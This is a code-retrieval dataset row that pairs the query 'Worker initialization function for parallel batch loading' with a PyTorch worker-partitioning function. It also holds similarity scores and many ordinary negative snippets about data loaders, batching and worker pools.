maxvals.reshape((batch_size, num_joints, 1))\n idx = idx.reshape((batch_size, num_joints, 1))\n preds = np.tile(idx, (1, 1, 2)).astype(np.float32)\n preds[:, :, 0] = (preds[:, :, 0]) % width\n preds[:, :, 1] = np.floor((preds[:, :, 1]) / width)\n pred_mask = np.tile(np.greater(maxvals, 0.0), (1, 1, 2))\n pred_mask = pred_mask.astype(np.float32)\n preds *= pred_mask\n return preds, maxvals", "def __len__(self):\n return int(np.floor(len(self.indexes) / self.batch_size))", "def __len__(self):\n return int(np.floor(len(self.indexes) / self.batch_size))", "def __len__(self):\n return int(np.floor(len(self.indexes) / self.batch_size))", "def data_edge_count_max(self) -> int:\n return int(self.graph_tuple_stats.data_edge_count_max or 0)", "def max_noutput_items(self) -> \"int\":\n return _beamforming_swig.randomsampler_sptr_max_noutput_items(self)", "def __len__(self):\n if self.batch_size == 1:\n return 
len(self.index_list)\n else:\n return max(1, len(self.index_list)//self.batch_size)", "def __len__(self):\n return max(self.A_size, self.B50_size, self.B100_size, self.B150_size)", "def n_valid_rows(n, X):\n if n > X.shape[0]:\n return X.shape[0]\n return n", "def __len__(self):\n\n return math.ceil(len(self.img_files) * self.gen_count / self.batch_size)", "def max_count(self):\n return self.config.get('max_count', 500)", "def batch_size(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"batch_size\")", "def max_instance_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"max_instance_count\")", "def max_instance_count(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"max_instance_count\")", "def num_examples_per_epoch(self):\n\t\tif self.subset == 'train':\n\t\t\treturn 50000\n\t\tif self.subset == 'validation':\n\t\t\treturn 10000", "def num_training_examples(self):" ]
[ "0.6792534", "0.659393", "0.65083873", "0.64983654", "0.6442182", "0.6357087", "0.6351913", "0.63443124", "0.6337801", "0.630785", "0.62681437", "0.6250322", "0.6208346", "0.6205874", "0.616179", "0.61612123", "0.6137554", "0.6132003", "0.612465", "0.6107981", "0.61064506", "0.61027664", "0.60993475", "0.6096231", "0.6074781", "0.60655445", "0.60606486", "0.6056908", "0.604342", "0.6014732", "0.6010511", "0.600997", "0.6006281", "0.5998703", "0.59957033", "0.59928393", "0.59927994", "0.5976023", "0.5968626", "0.5965454", "0.5961322", "0.5942122", "0.59295017", "0.59208804", "0.59197223", "0.59085155", "0.59064686", "0.5904791", "0.5885887", "0.5882013", "0.58777356", "0.58748233", "0.5872975", "0.5869496", "0.5869161", "0.5866166", "0.5866114", "0.5863786", "0.58560616", "0.58560616", "0.58560616", "0.58560616", "0.58560616", "0.585352", "0.58518267", "0.5847155", "0.5845512", "0.5839108", "0.5839108", "0.5839108", "0.5829433", "0.58232826", "0.5820333", "0.5820227", "0.5818449", "0.5818156", "0.580663", "0.5777787", "0.57775766", "0.57706046", "0.5769276", "0.57683706", "0.5761545", "0.5740511", "0.5739504", "0.57370645", "0.57370645", "0.57370645", "0.5728256", "0.57273537", "0.5727335", "0.57202804", "0.5715721", "0.5715228", "0.57071614", "0.569941", "0.56920797", "0.56920797", "0.5685712", "0.56839347" ]
0.78903097
0
Worker initialization function for parallel batch loading.
def partition(worker_id):
    worker_info = torch.utils.data.get_worker_info()
    dataset = worker_info.dataset
    # Re-create BigTIFF objects that turned stale after serialization:
    for region in dataset.BigTIFFs:
        imgfile = dataset.BigTIFFs[region].Source
        dirID = dataset.BigTIFFs[region].DirectoryID
        patchSize = dataset.BigTIFFs[region].PatchSize[dirID]
        dataset.BigTIFFs[region] = Bigtiff(imgfile)
        dataset.BigTIFFs[region].setDirectory(dirID)
        dataset.BigTIFFs[region].setPatchSize(patchSize)
    # configure the dataset to only process the split workload
    per_worker = int(math.ceil(dataset.SampleID.shape[0] / float(worker_info.num_workers)))
    sampleStart = worker_id * per_worker
    sampleEnd = sampleStart + per_worker
    dataset.SampleID = dataset.SampleID[sampleStart:sampleEnd]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def init_batch(self):\n pass", "def _initJobs(self):\n pass", "def start_loading(self):\n if self.loading:\n warnings.warn('Loader is already loading!')\n return\n \n assert self.batch_queue is not None\n batch_queue = self.batch_queue\n \n # Start worker processes\n worker_indices, worker_samples = self._get_worker_indices_samples()\n self.sample_queues = []\n for i, worker in enumerate(self.workers):\n if worker is not None:\n assert False, f'Something is very wrong with worker init.'\n else:\n sample_queue = python_mp.Queue()\n for ex_samples in worker_samples[i]:\n sample_queue.put(ex_samples)\n \n args = (sample_queue, batch_queue, self.example_creator_fn,\n self.batch_collate_fn)\n new_worker = Process(target=worker_fn, args=args)\n new_worker.daemon = True\n self.workers[i] = new_worker\n new_worker.start()\n self.loading = True", "def init_worker(X, X_shape, Y, Y_shape):\n arr_dict['X'] = X\n arr_dict['X_shape'] = X_shape\n arr_dict['Y'] = Y\n arr_dict['Y_shape'] = Y_shape", "def initialize(self):\n # set the maximum queue size (number of jobs to queue past the running number)\n self.maxQueueSize = self.runInfoDict['maxQueueSize']\n # defaults to None; if None, then use batchSize instead\n if self.maxQueueSize is None:\n self.maxQueueSize = self.runInfoDict['batchSize']\n # if requested max size less than 1, we can't do that, so take 1 instead\n if self.maxQueueSize < 1:\n self.raiseAWarning('maxQueueSize was set to be less than 1! Setting to 1...')\n self.maxQueueSize = 1\n self.raiseADebug('Setting maxQueueSize to', self.maxQueueSize)\n\n # initialize PBS\n with self.__queueLock:\n self.__running = [None]*self.runInfoDict['batchSize']\n self.__clientRunning = [None]*self.runInfoDict['batchSize']\n self._parallelLib = ParallelLibEnum.shared\n if self.runInfoDict['parallelMethod'] is not None and self.runInfoDict['parallelMethod'] != ParallelLibEnum.distributed:\n self._parallelLib = self.runInfoDict['parallelMethod']\n elif self.runInfoDict['internalParallel'] or \\\n self.runInfoDict['parallelMethod'] is not None and self.runInfoDict['parallelMethod'] == ParallelLibEnum.distributed:\n #If ParallelLibEnum.distributed or internalParallel True\n # than choose a library automatically.\n if _daskAvail:\n self._parallelLib = ParallelLibEnum.dask\n elif _rayAvail:\n self._parallelLib = ParallelLibEnum.ray\n else:\n self.raiseAWarning(\"Distributed Running requested but no parallel method found\")\n self._parallelLib = ParallelLibEnum.shared\n desiredParallelMethod = f\"parallelMethod: {self.runInfoDict['parallelMethod']} internalParallel: {self.runInfoDict['internalParallel']}\"\n self.raiseADebug(f\"Using parallelMethod: {self._parallelLib} because Input: {desiredParallelMethod} and Ray Availablility: {_rayAvail} and Dask Availabilitiy: {_daskAvail}\")\n if self._parallelLib == ParallelLibEnum.dask and not _daskAvail:\n self.raiseAnError(RuntimeError, f\"dask requested but not available. {desiredParallelMethod}\")\n if self._parallelLib == ParallelLibEnum.ray and not _rayAvail:\n self.raiseAnError(RuntimeError, f\"ray requested but not available. 
{desiredParallelMethod}\")\n # internal server is initialized only in case an internal calc is requested\n if not self.__isDistributedInitialized:\n self.__initializeDistributed()", "def init_worker(*shared_args_list):\n global SHARED_ARGS\n SHARED_ARGS = shared_args_list", "def evaluate_system__initialize_workers(opts, dictionary, features, labels):\n global evaluate_system__worker_cache\n evaluate_system__worker_cache = {\"opts\": opts, \"dictionary\": dictionary, \"features\": features, \"labels\": labels}", "def __init__(self, w, p, location, foldername, featurefiles, maskfiles, nclasses, kw={}, num_threads=4, batch_size=1):\n super(ThreadedDataSetCollection, self).__init__(w, p, location, foldername, featurefiles, maskfiles, nclasses, kw={})\n # data_kw, kw = compile_arguments(ThreadedDataSetCollection, kw, transitive=False)\n # for k, v in data_kw.items():\n # setattr(self, k, v)\n self.num_threads = num_threads\n self.batch_size = batch_size\n\n # self.batch_size = argget(kw, 'batchsize', 1)\n self.curr_thread = 0\n self._batch = [None for _ in range(self.num_threads)]\n self._batchlabs = [None for _ in range(self.num_threads)]\n self._preloadthreads = [Thread(target=self._preload_random_sample, args=(self.batch_size, it,)) for it in\n range(self.num_threads)]\n for t in self._preloadthreads:\n t.start()", "def __init__(self):\n self.num_mini_batches = 0", "def recognition_system__initialize_workers(opts, dictionary):\n global recognition_system__worker_cache\n recognition_system__worker_cache = {\"opts\": opts, \"dictionary\": dictionary}", "def init(number_of_workers=0):\n global _wq, _use_workers\n\n if number_of_workers:\n _use_workers = number_of_workers\n else:\n _use_workers = benchmark_workers()\n\n # if it is best to use zero workers, then use that.\n _wq = WorkerQueue(_use_workers)", "def _initialize_worker_prior(self):\r\n df = pd.read_csv(self._filepath, sep='\t')\r\n self._workers_id = df['!amt_worker_ids'].unique().tolist()\r\n for worker_id in self._workers_id:\r\n self._workers_prior[worker_id] = [self._c0, self._d0]", "def __init__(self, init_size=31):\n self.keys = build_array(init_size) # Parallel arrays - key[]\n self.values = build_array(init_size) # Parallel arrays - values[]\n self.size = init_size\n self.count = 0\n # Task3 counters\n self.count_collisions = 0\n self.total_probe_length = 0\n self.count_rehashes = 0\n self.longest_probe_chain = 0", "def __init__(self, args):\n self.train_img_file = os.path.join(args.data_dir, args.train_img_file)\n self.train_lbl_file = os.path.join(args.data_dir, args.train_lbl_file)\n self.test_img_file = os.path.join(args.data_dir, args.test_img_file)\n self.test_lbl_file = os.path.join(args.data_dir, args.test_lbl_file)\n self.batch_size = args.batch_size\n self.num_workers = args.data_workders\n self.shuffle = True\n self.dataset_name = args.dataset_name\n self.pin_memory = False #args.cuda\n\n # check dataset files exist\n files = [self.train_img_file, self.train_lbl_file,\n self.test_img_file, self.test_lbl_file]\n for file in files:\n if not os.path.isfile(file):\n msg = \"Data file not found. 
Please check the path \" +\\\n \"or download files using scripts/download_files.py \"\n raise IOError(msg)", "def __init__(self, worker):\n self._worker = worker\n self._jobs = Queue()\n self._results, self._errors = [], []\n self._jobfinished = Condition()", "def _get_executor_init(self, workers):\n raise NotImplementedError", "def worker_init_fn(self, worker_id: int) -> None:\n np.random.seed(np.random.get_state()[1][0] + worker_id + random.randint(1, 1000))\n\n worker_info = torch.utils.data.get_worker_info()\n worker_info.dataset.set_worker_id(worker_id)\n worker_info.dataset.examples, shard_stats = self.get_worker_shard(\n worker_info.dataset.examples, worker_info.num_workers, worker_id\n )\n worker_info.dataset.logger.info(\n f\"Stats for shard created for worker {worker_id}: \\n {shard_stats}\"\n )\n worker_info.dataset.create_language_index_mapping()", "def __init__(self, path_to_jobs, dset, job, sim, scale, stitch, ring, conn):\n self.path_to_jobs = path_to_jobs\n self.dset = dset\n self.job = job\n self.sim = sim\n self.scale = scale\n self.stitch = stitch\n self.ring = ring\n self.conn = conn\n\n self.worker = None\n self.header = None", "def initialize(self, setting):\n\n # record type mappings \n for worker in setting[\"workers\"]:\n wid = worker[\"id\"]\n flavor = worker[\"flavor\"]\n self.worker_flavor[wid] = flavor\n self.workers[wid] = Worker(wid, self.mode)\n\n self.workload = [0 for _ in range(len(self.workers))]\n\n # record neighboring nodes \n for u, v in setting[\"neighbor_map\"]:\n self.neighbors[u].add(v) \n self.neighbors[v].add(u)\n\n self.initialized = True", "def initialise_dataset_loader(\n self, data_param=None, task_param=None, data_partitioner=None):\n raise NotImplementedError", "def __init__(self, *args, **kwargs):\n # count the cores available on the local machine\n self.tasks = mp.cpu_count()\n super(ParallelPreprocessor, self).__init__(*args, **kwargs)", "def __init__(self, *args, wick_parallel=0, **kwargs):\n super().__init__(*args, **kwargs)\n self._wick_parallel = wick_parallel", "def setup_worker_threads(self):\n \n for thread_number in range(0, self.max_workers):\n worker = DeviceWorker(self, thread_number)\n self.worker_threads.append(worker)\n worker.start()", "def __init__(self, num_workers, mb=None):\n self._state = SharedState(mb=mb)\n self._procs = self._state.make_procs(num_workers)", "def init_worker(self, worker_id) :\n\n # since this is called in a separate process,\n # we need to get a consistent view of the settings\n startup.main(self.mode, self.rank)\n\n # initialize the random seed for this process\n # we don't use just the worker_id but also the rank\n # so we truly get different random numbers in all workers,\n # not restricted to the current pool\n # note that we get some entropy from the time\n # so different epochs get different data augmentations\n np.random.seed((hash(time())\n + (settings.RANK * torch.utils.data.get_worker_info().num_workers\n + worker_id)) % 2**32)", "def construct_threads(self, process, flag):\n\t\tself.parallel_threads.append(self.prepare_batch(process, flag))", "def setup_jobs(self):\n transfer_args = [\"analysis_type\", \"perturbation\", \"num_permutations\", \"permutation_test_statistic\", \"loss_function\",\n \"importance_significance_level\", \"window_search_algorithm\", \"window_effect_size_threshold\"]\n jobs = [None] * self.num_jobs\n for idx in range(self.num_jobs):\n # Create and launch condor job\n features_filename = constants.INPUT_FEATURES_FILENAME.format(self.args.output_dir, idx)\n 
input_files = [features_filename, self.args.model_filename, self.args.model_loader_filename, self.args.data_filename]\n job_dir = f\"{self.args.output_dir}/outputs_{idx}\"\n cmd = f\"python3 -m anamod.core.worker -worker_idx {idx}\"\n for arg in transfer_args:\n if hasattr(self.args, arg):\n cmd += f\" -{arg} {getattr(self.args, arg)}\"\n # Relative file paths for non-shared FS, absolute for shared FS\n for name, path in dict(output_dir=job_dir, features_filename=features_filename, model_filename=self.args.model_filename,\n model_loader_filename=self.args.model_loader_filename, data_filename=self.args.data_filename).items():\n cmd += f\" -{name} {os.path.abspath(path)}\" if self.args.shared_filesystem else f\" -{name} {os.path.basename(path)}\"\n job = CondorJobWrapper(cmd, input_files, job_dir, shared_filesystem=self.args.shared_filesystem,\n memory=f\"{self.args.memory_requirement}GB\", disk=f\"{self.args.disk_requirement}GB\",\n avoid_bad_hosts=self.args.avoid_bad_hosts, retry_arbitrary_failures=self.args.retry_arbitrary_failures,\n cleanup=self.args.cleanup)\n jobs[idx] = job\n return jobs", "async def _setup(self):\n\n Reporter.info('Setting up workers...')\n self.workers = [asyncio.Task(self._work(), loop=self.loop)\n for _ in range(self.MAX_WORKERS)]\n Reporter.info('Starting scan...')\n await self.q.join()", "def __init__(self):\n self.args = self._prepare_args(locals())\n self.requires_full_dataset_in_memory = False", "def worker_init_fn(worker_id: int) -> None:\n worker_info = torch.utils.data.get_worker_info()\n set_rnd(worker_info.dataset, seed=worker_info.seed) # type: ignore[union-attr]", "def __init__(self, run, expname):\n logger.debug('Initializing worker {}.'.format(rank))\n self.run = int(run)\n self.expname = expname\n bcast_var = None\n dsname = comm.bcast(bcast_var, root=0)\n print(dsname)\n \n print('********** Start setup.')\n t0 = time.time()\n self.dsIdx = psana.DataSource(str(dsname))\n logger.info('********** Datasource on rank {}: {}s'.format(rank, time.time()-t0))\n self.dsIdxRun = next(self.dsIdx.runs())\n self.parse_detectors()\n logger.info('Rank {} has datasource and detectors.'.format(rank))\n print('********** Setup on rank {}: {}s'.format(rank, time.time()-t0))\n return", "def __init__(self, pipeline):\n self._jobs = []\n self._active_jobs = []\n\n self._threads = []\n self._thread_index = {}\n self._thread_id = 1\n\n\n self.local_backend = Local()\n self.backend = None\n\n self.pipeline = pipeline", "def _generate_and_load_initial_batch(self, working_directory: Path):\n\n template_dir = Path(working_directory) / \"template_1\"\n template_dir.mkdir()\n # changes here should often be reflected in\n # data_generator_opts and data_loader_opts\n\n channel_decl = self.channel_configs[0]\n\n plugin_options = {\n \"pid\": \"0\",\n \"big_ids\": \"True\",\n }\n # if it's efficient to do the whole load in one go, let's just do that.\n if self.run_until.gap < MIN_PORTION_SIZE:\n num_records = self.run_until.gap\n else:\n num_records = 1 # smallest possible batch to get to parallelizing fast\n results = self._generate_and_load_batch(\n template_dir,\n channel_decl.org_config,\n {\n \"generator_yaml\": self.options.get(\"recipe\"),\n \"num_records\": num_records,\n \"num_records_tablename\": self.run_until.sobject_name or COUNT_REPS,\n \"loading_rules\": self.loading_rules,\n \"vars\": channel_decl.merge_recipe_options(self.recipe_options),\n \"plugin_options\": plugin_options,\n \"bulk_mode\": self.bulk_mode,\n },\n )\n 
self.update_running_totals_from_load_step_results(results)\n\n # rename directory to reflect real number of sets created.\n wd = SnowfakeryWorkingDirectory(template_dir)\n if self.run_until.sobject_name:\n self.sets_finished_while_generating_template = wd.get_record_counts()[\n self.run_until.sobject_name\n ]\n else:\n self.sets_finished_while_generating_template = num_records\n\n new_template_dir = data_loader_new_directory_name(template_dir, self.run_until)\n shutil.move(template_dir, new_template_dir)\n template_dir = new_template_dir\n\n # don't send data tables to child processes. All they\n # care about are ID->OID mappings\n wd = SnowfakeryWorkingDirectory(template_dir)\n self._cleanup_object_tables(*wd.setup_engine())\n\n return template_dir, wd.relevant_sobjects()", "def __init__(self, dataset, batch_size, n_threads=4,\n\t ten_crop=False, data_path='/home/dataset/', logger=None):\n\t\tself.dataset = dataset\n\t\tself.batch_size = batch_size\n\t\tself.n_threads = n_threads\n\t\tself.ten_crop = ten_crop\n\t\tself.data_path = data_path\n\t\tself.logger = logger\n\t\tself.dataset_root = data_path\n\t\t\n\t\tself.logger.info(\"|===>Creating data loader for \" + self.dataset)\n\t\t\n\t\tif self.dataset in [\"cifar100\"]:\n\t\t\tself.train_loader, self.test_loader = self.cifar(\n\t\t\t\tdataset=self.dataset)\n\n\t\telif self.dataset in [\"cifar10\"]:\n\t\t\tself.train_loader, self.test_loader = self.cifar(\n dataset=self.dataset)\n\t\t\n\t\telif self.dataset in [\"imagenet\"]:\n\t\t\tself.train_loader, self.test_loader = self.imagenet(\n\t\t\t\tdataset=self.dataset)\n\t\telse:\n\t\t\tassert False, \"invalid data set\"", "def __init__( self, app, nworkers, **kwds ):\n super( LwrJobRunner, self ).__init__( app, nworkers, runner_param_specs=LWR_PARAM_SPECS, **kwds )\n self._init_worker_threads()\n galaxy_url = self.runner_params.galaxy_url\n if galaxy_url:\n galaxy_url = galaxy_url.rstrip(\"/\")\n self.galaxy_url = galaxy_url\n self.__init_client_manager()\n if self.runner_params.url:\n # This is a message queue driven runner, don't monitor\n # just setup required callback.\n self.client_manager.ensure_has_status_update_callback(self.__async_update)\n else:\n self._init_monitor_thread()", "def __init__(self):\n # load files\n self.init_bin_start_time = load_last_bin_time()\n self.prev_value_cache = load_prev_val_cache()\n self.init_job_vals_dict = load_job_init_vals()\n\n config = load_config()\n self.database_domain = config[ConfigFields.DATABASE_DOMAIN]\n self.metrics = config[ConfigFields.METRICS]\n self.bin_duration = config[ConfigFields.BIN_DURATION]\n\n \"to be overwritten when server time is found in a job\"\n self.current_time = int(time.time())\n self.bin_start_times = None # updated below\n self.final_bin_end_time = None # updated below\n self.update_bin_times() # updates", "def __init__(\n self, batch_size: int = 64, num_workers: int = 0, **kwargs: Any\n ) -> None:\n super().__init__(EuroSAT100, batch_size, num_workers, **kwargs)", "def __init__(self, worker_device):\n self._worker_device = worker_device\n self._local_map = {}\n self._global_map = {}", "def __init__(self, task_manager, num_samples, num_shards, kernel, scale,\n bucket, directory):\n # Task parameters\n self.task_manager = task_manager\n self.num_samples = num_samples\n self.num_shards = num_shards\n\n # Patches paramters\n self.kernel = kernel\n self.scale = scale\n\n # Storage location\n self.bucket = bucket\n self.directory = directory", "def _call_initialization(self,\r\n input_fp,\r\n output_dir,\r\n 
params,\r\n job_prefix,\r\n poll_directly,\r\n suppress_submit_jobs):\r\n pass", "def _get_executor_init(self, workers):\n def pool_fn(seqs):\n pool = get_pool_class(True)(\n workers, initializer=init_pool_generator,\n initargs=(seqs, None, get_worker_id_queue()))\n _DATA_POOLS.add(pool)\n return pool\n\n return pool_fn", "def __init__(self, jobs, worker_names):\n self._all_jobs = [Job(_i) for _i in jobs]\n self._in_queue = self._all_jobs[:]\n self._finished_jobs = []\n self._poison_pills_received = 0\n\n self._workers = {_i: Worker([], [0]) for _i in worker_names}\n\n self._starttime = time.time()", "def _initJobs(self):\n super(DigestManager, self)._initJobs()\n conf = self.config.container_manager\n\n job4 = LoopingCall(self.performRequestedScan)\n job4.start(float(conf.activescan_interval))\n self.jobs.append(job4)", "def _get_executor_init(self, workers):\n def pool_fn(seqs):\n pool = get_pool_class(True)(\n workers, initializer=init_pool_generator,\n initargs=(seqs, self.random_seed, get_worker_id_queue()))\n _DATA_POOLS.add(pool)\n return pool\n return pool_fn", "def initialize_threading(self, worker_env=None):\n if not (os.path.exists(core.config.paths.zmq_public_keys_path) and\n os.path.exists(core.config.paths.zmq_private_keys_path)):\n logging.error(\"Certificates are missing - run generate_certificates.py script first.\")\n sys.exit(0)\n\n for i in range(NUM_PROCESSES):\n args = (i,)\n if worker_env:\n args = (i, worker_env,)\n\n pid = multiprocessing.Process(target=loadbalancer.Worker, args=args)\n pid.start()\n self.pids.append(pid)\n\n self.ctx = zmq.Context.instance()\n self.auth = ThreadAuthenticator(self.ctx)\n self.auth.start()\n self.auth.allow('127.0.0.1')\n self.auth.configure_curve(domain='*', location=core.config.paths.zmq_public_keys_path)\n\n self.load_balancer = loadbalancer.LoadBalancer(self.ctx)\n self.receiver = loadbalancer.Receiver(self.ctx)\n\n self.receiver_thread = threading.Thread(target=self.receiver.receive_results)\n self.receiver_thread.start()\n\n self.manager_thread = threading.Thread(target=self.load_balancer.manage_workflows)\n self.manager_thread.start()\n\n self.threading_is_initialized = True\n logger.debug('Controller threading initialized')\n gevent.sleep(0)", "def initialize(self,init):\n logger.info('*** initialize: worker id=%d',self._agent.wid)\n self.commands = {'initialize':None, 'before_do_work':None, 'after_do_work':None, 'finalize':None}\n self.commands.update(init.get(self._agent.wid,{}))\n exec_command(self.commands['initialize'])", "def __init__(\n self,\n local_worker: RolloutWorker,\n num_gpus: int = 1,\n lr=None, # deprecated.\n train_batch_size: int = 500,\n num_multi_gpu_tower_stacks: int = 1,\n minibatch_buffer_size: int = 1,\n num_sgd_iter: int = 1,\n learner_queue_size: int = 16,\n learner_queue_timeout: int = 300,\n num_data_load_threads: int = 16,\n _fake_gpus: bool = False):\n LearnerThread.__init__(self, local_worker, minibatch_buffer_size,\n num_sgd_iter, learner_queue_size,\n learner_queue_timeout)\n self.train_batch_size = train_batch_size\n\n # TODO: (sven) Allow multi-GPU to work for multi-agent as well.\n self.policy = self.local_worker.policy_map[DEFAULT_POLICY_ID]\n\n logger.info(\"MultiGPULearnerThread devices {}\".format(\n self.policy.devices))\n assert self.train_batch_size % len(self.policy.devices) == 0\n assert self.train_batch_size >= len(self.policy.devices),\\\n \"batch too small\"\n\n if set(self.local_worker.policy_map.keys()) != {DEFAULT_POLICY_ID}:\n raise NotImplementedError(\"Multi-gpu mode for 
multi-agent\")\n\n self.tower_stack_indices = list(range(num_multi_gpu_tower_stacks))\n\n self.idle_tower_stacks = queue.Queue()\n self.ready_tower_stacks = queue.Queue()\n for idx in self.tower_stack_indices:\n self.idle_tower_stacks.put(idx)\n for i in range(num_data_load_threads):\n self.loader_thread = _MultiGPULoaderThread(\n self, share_stats=(i == 0))\n self.loader_thread.start()\n\n self.minibatch_buffer = MinibatchBuffer(\n self.ready_tower_stacks, minibatch_buffer_size,\n learner_queue_timeout, num_sgd_iter)", "def __init__(self, n_jobs=1, verbose=True):\n self.n_jobs = n_jobs\n self.verbose = verbose", "def __init__process(self, n_cpu):\n global shared_slices\n global shared_data\n\n shared_slices_base = sharedctypes.RawArray(ctypes.c_double,\n self._projection.shape[0])\n shared_slices = np.frombuffer(shared_slices_base)\n shared_slices = shared_slices.reshape((len(self._q.R), -1))\n\n shared_grad_base = sharedctypes.RawArray(ctypes.c_double,\n self._projection.shape[0])\n shared_grad = np.frombuffer(shared_grad_base)\n shared_grad = shared_grad.reshape((len(self._q.R), -1))\n\n shared_data_base = mp.Array(ctypes.c_double,\n self._data.size,\n lock=False)\n shared_data = np.ctypeslib.as_array(shared_data_base)\n shared_data = shared_data.reshape(self._data.shape)\n shared_data[:] = self._data\n\n self._pool = mp.Pool(n_cpu)", "def init_workers(dist_mode):\n if dist_mode == 'ddp-file':\n from distributed.torch import init_workers_file\n return init_workers_file()\n elif dist_mode == 'ddp-mpi':\n from distributed.torch import init_workers_mpi\n return init_workers_mpi()\n elif dist_mode == 'cray':\n from distributed.cray import init_workers_cray\n return init_workers_cray()\n return 0, 1", "def init_workers(dist_mode):\n if dist_mode == 'ddp-file':\n from distributed.torch import init_workers_file\n return init_workers_file()\n elif dist_mode == 'ddp-mpi':\n from distributed.torch import init_workers_mpi\n return init_workers_mpi()\n elif dist_mode == 'cray':\n from distributed.cray import init_workers_cray\n return init_workers_cray()\n return 0, 1", "def init_mesh(self):\n inputs = self.inputs\n read_mesh = \"input_db\" in inputs\n if read_mesh:\n _lgr.info(\"NaluTaskRunner: initializing mesh meta data\")\n self.mesh.init_mesh_meta(inputs.input_db)\n\n for task in self.task_list:\n task.init_meta_data()\n\n read_time = 0.0\n if read_mesh:\n _lgr.info(\"NaluTaskRunner: populating bulk data\")\n read_time = self.mesh.init_mesh_bulk(inputs.input_db)\n else:\n self.mesh.meta.commit()\n self.read_time = read_time", "def _initJobs(self):\n assert not hasattr(self, 'jobs'), '_initJobs should only be called once'\n\n conf = self.config.container_manager\n self.jobs = []\n\n job1 = LoopingCall(self.updateOurContainer)\n job1.start(float(conf.updateoursd_interval))\n self.jobs.append(job1)\n\n job2 = LoopingCall(self.retrieveContainer)\n job2.start(float(conf.retrievesd_interval))\n self.jobs.append(job2)\n\n job3 = LoopingCall(self.relationshipRedemption)\n job3.start(float(conf.redemption_hours))\n self.jobs.append(job3)", "def __init__(self, init_value, add_value, iterations, **extra_args):\n\n self.init = init_value\n self.increment = add_value\n self.limit = iterations\n self.jobname = \"Gdemo_Iteration\"\n\n gc3libs.log.info(\"Calling DemoIteration.__init__() ... 
\")\n\n # create initial task and register it\n initial_task = GdemoApplication(self.init, self.increment, 0)\n SequentialTaskCollection.__init__(self, [initial_task], **extra_args)", "def __init__(self):\n self._event = multiprocessing.Event()\n self._queue = multiprocessing.JoinableQueue()\n self._results = multiprocessing.Queue()\n self._spawn_workers()\n self.population = self._seed_population()", "def __init__(self, **kwargs):\n allowed_kwargs = [\"memory\", \"verbose\", \"n_jobs\", \"feature_batch\"]\n\n for k in kwargs:\n if k not in allowed_kwargs:\n raise TypeError(f\"{k} not allowed as kwargs\")\n memory = kwargs.get(\"memory\", None)\n if isinstance(memory, bool):\n memory = tempfile.mkdtemp()\n logger.info(f\"Created temporary directory {memory}\")\n verbose = kwargs.get(\"verbose\", False)\n n_jobs = kwargs.get(\"n_jobs\", 0)\n\n self.memory = check_memory(memory)\n self.verbose = verbose\n # find out the number of parallel jobs\n if (n_jobs < 0) or (n_jobs > cpu_count()):\n n_jobs = cpu_count()\n logger.info(f\"Using {n_jobs} jobs for computation\")\n self.n_jobs = n_jobs\n self.feature_batch = get_feature_batch(kwargs.get(\"feature_batch\", None))", "def setUp(self) :\n self.longMessage = True\n logger = corAna.makeLogger(isTestMode=True,isMaster=True,isViewer=True,isServer=True,rank=0)\n isFirstWorker = True\n self.numTimes = 5\n numDataPointsThisWorker = 1\n\n self.workerData = corAna.WorkerData(logger, isFirstWorker, self.numTimes,\n numDataPointsThisWorker, addRemoveCallbackObject = None)", "def _init_train_loader(self):\n # Choose the right dataset type\n if self.config_args[\"num_members\"] > 1:\n class_dataset_wrapper = dataset_wrapper.MixMoDataset\n else:\n class_dataset_wrapper = dataset_wrapper.MSDADataset\n\n # Load augmentations\n self.traindatasetwrapper = class_dataset_wrapper(\n dataset=self.train_dataset,\n num_classes=int(self.config_args[\"data\"][\"num_classes\"]),\n num_members=self.config_args[\"num_members\"],\n dict_config=self.config_args[\"training\"][\"dataset_wrapper\"],\n properties=self.properties\n )\n\n # Build standard sampler\n _train_sampler = torch.utils.data.sampler.RandomSampler(\n data_source=self.traindatasetwrapper, ## only needed for its length\n num_samples=None,\n replacement=False,\n )\n\n # Wrap it with the repeating sampler used for multi-input models\n batch_sampler = batch_repetition_sampler.BatchRepetitionSampler(\n sampler=_train_sampler,\n batch_size=self.batch_size,\n num_members=self.config_args[\"num_members\"],\n drop_last=True,\n config_batch_sampler=self.config_args[\"training\"][\"batch_sampler\"]\n )\n\n self.train_loader = torch.utils.data.DataLoader(\n self.traindatasetwrapper,\n batch_sampler=batch_sampler,\n num_workers=self.num_workers,\n batch_size=1,\n shuffle=False,\n sampler=None,\n drop_last=False,\n pin_memory=True,\n )", "def worker_init_fn(worker_id, num_workers, rank, seed):\n\n worker_seed = num_workers * rank + worker_id + seed\n np.random.seed(worker_seed)\n random.seed(worker_seed)", "def worker_init_fn(worker_id, num_workers, rank, seed):\n\n worker_seed = num_workers * rank + worker_id + seed\n np.random.seed(worker_seed)\n random.seed(worker_seed)", "def initialize(self):\n \n casalog.origin(\"ParallelDataHelper\")\n\n # self._arg is populated inside ParallelTaskHelper._init_()\n self._arg['vis'] = os.path.abspath(self._arg['vis'])\n # MPI setting\n if self._mpi_cluster:\n self._cluster.start_services()\n \n if (self._arg['outputvis'] != \"\"):\n self._arg['outputvis'] = 
os.path.abspath(self._arg['outputvis']) \n\n outputPath, self.outputBase = os.path.split(self._arg['outputvis'])\n try:\n if self.outputBase[-1] == '.':\n self.outputBase = self.outputBase[:self.outputBase.rindex('.')]\n except ValueError:\n # outputBase must not have a trailing .\n pass\n\n if self.outputBase == '.' or self.outputBase == './':\n raise ValueError, 'Error dealing with outputvis'\n \n # The subMS are first saved inside a temporary directory\n self.dataDir = outputPath + '/' + self.outputBase+'.data'\n if os.path.exists(self.dataDir): \n shutil.rmtree(self.dataDir)\n\n os.mkdir(self.dataDir)", "def worker_init_fn(worker_id):\r\n base_seed = torch.IntTensor(1).random_().item()\r\n #print(worker_id, base_seed)\r\n np.random.seed(base_seed + worker_id)", "def initialize(self, myid, dispatcher, **model_params):\n self.lock_update = threading.Lock()\n self.jobsdone = 0 # how many jobs has this worker completed?\n # id of this worker in the dispatcher; just a convenience var for easy access/logging TODO remove?\n self.myid = myid\n self.dispatcher = dispatcher\n self.finished = False\n logger.info(\"initializing worker #%s\", myid)\n self.model = lsimodel.LsiModel(**model_params)", "def _LoadThreaded(self, vms, workload_file, **kwargs):\n results = []\n\n kwargs.setdefault('threads', self._default_preload_threads)\n if 